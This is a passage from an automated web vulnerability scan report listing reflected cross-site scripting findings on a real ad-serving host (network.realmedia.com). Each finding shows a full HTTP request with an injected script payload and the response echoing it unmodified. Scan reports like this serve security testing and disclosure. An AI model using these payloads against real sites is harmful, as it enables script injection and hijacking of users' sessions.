Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|OA016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:49:11 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 262
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3045525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:40:13 GMT;path=/

<a href="https://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure27f2d"><script>alert(1)</script>d7bc9b80311/L18/1309133988/Bottom3/USNetwork/TRACK_Default/1x1gif.html/726348573830307044726341416f7670?1309133988" TARGET=_blank>

4.659. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/243052316@Bottom3 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/243052316@Bottom3

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9045f"><script>alert(1)</script>191b65027bf was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/243052316@Bottom39045f"><script>alert(1)</script>191b65027bf?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|OA016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:49:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 390
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0c45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:40:18 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure/1943704596/Bottom39045f"><script>alert(1)</script>191b65027bf/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.660. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/311285161@Bottom3 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/311285161@Bottom3

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47b28"><script>alert(1)</script>8928d95ff49 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia47b28"><script>alert(1)</script>8928d95ff49/Retarget_Secure/311285161@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|O9016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:54 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 397
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:57 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia47b28"><script>alert(1)</script>8928d95ff49/Retarget_Secure/805451115/Bottom3/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.661. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/311285161@Bottom3 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/311285161@Bottom3

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c040"><script>alert(1)</script>f6f1f1a114a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure1c040"><script>alert(1)</script>f6f1f1a114a/311285161@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|O9016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:49:00 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 258
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3045525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:40:02 GMT;path=/

<a href="https://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure1c040"><script>alert(1)</script>f6f1f1a114a/L18/29701771/Bottom3/USNetwork/TRACK_Default/1x1gif.html/726348573830307044726341416f7670?29701771" TARGET=_blank>

4.662. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/311285161@Bottom3 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/311285161@Bottom3

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18d3d"><script>alert(1)</script>dfdf641f922 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/311285161@Bottom318d3d"><script>alert(1)</script>dfdf641f922?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|O9016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:49:05 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 389
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3145525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:40:07 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure/395763225/Bottom318d3d"><script>alert(1)</script>dfdf641f922/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.663. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbc57"><script>alert(1)</script>fcf943483cb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmediadbc57"><script>alert(1)</script>fcf943483cb/Retarget_Secure/438702563@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O8016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:51 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 397
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:53 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmediadbc57"><script>alert(1)</script>fcf943483cb/Retarget_Secure/761707163/Bottom3/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.664. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e813"><script>alert(1)</script>f6bfea0e9d7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure7e813"><script>alert(1)</script>f6bfea0e9d7/438702563@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O8016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:56 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 262
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:58 GMT;path=/

<a href="https://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure7e813"><script>alert(1)</script>f6bfea0e9d7/L18/1330393018/Bottom3/USNetwork/TRACK_Default/1x1gif.html/726348573830307044726341416f7670?1330393018" TARGET=_blank>

4.665. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a286c"><script>alert(1)</script>b1305f9c9bc was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3a286c"><script>alert(1)</script>b1305f9c9bc?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O8016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:49:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 389
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:40:04 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure/840689523/Bottom3a286c"><script>alert(1)</script>b1305f9c9bc/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.666. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3 [_RM_HTML_MM_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3

Issue detail

The value of the _RM_HTML_MM_ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61eca"-alert(1)-"11fefb1e2e5 was submitted in the _RM_HTML_MM_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3?_RM_HTML_MM_=61eca"-alert(1)-"11fefb1e2e5 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O8016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:47:46 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|R10M5i|O10M5l|R10M5p|O10M5x|R10M62|O10M69|O1012Mr|O1016F7|O8016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 580
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:38:49 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA","OP","DO","CR","BR","CO","MO","PE","PR","PU","SP","SU","DI","EX","OM","DY","RS");
var mm247o = "61eca"-alert(1)-"11fefb1e2e5";
var mm247m = "";
if (mm247o.length==21) {
   var i=0;
   while (i<21) {
       mm247m += mmarray[i] + mm247o.charAt(i);
       i=i+1;
   }
}
document.cookie="mm247="+mm247m+";expires="+mm247d.toGMTString()
...[SNIP]...

4.667. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/509694158@Bottom3 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/509694158@Bottom3

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28bc9"><script>alert(1)</script>a17d56d34d0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia28bc9"><script>alert(1)</script>a17d56d34d0/Retarget_Secure/509694158@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:55 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 397
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0d45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:58 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia28bc9"><script>alert(1)</script>a17d56d34d0/Retarget_Secure/842430191/Bottom3/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.668. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/509694158@Bottom3 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/509694158@Bottom3

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31127"><script>alert(1)</script>5274148795f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure31127"><script>alert(1)</script>5274148795f/509694158@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
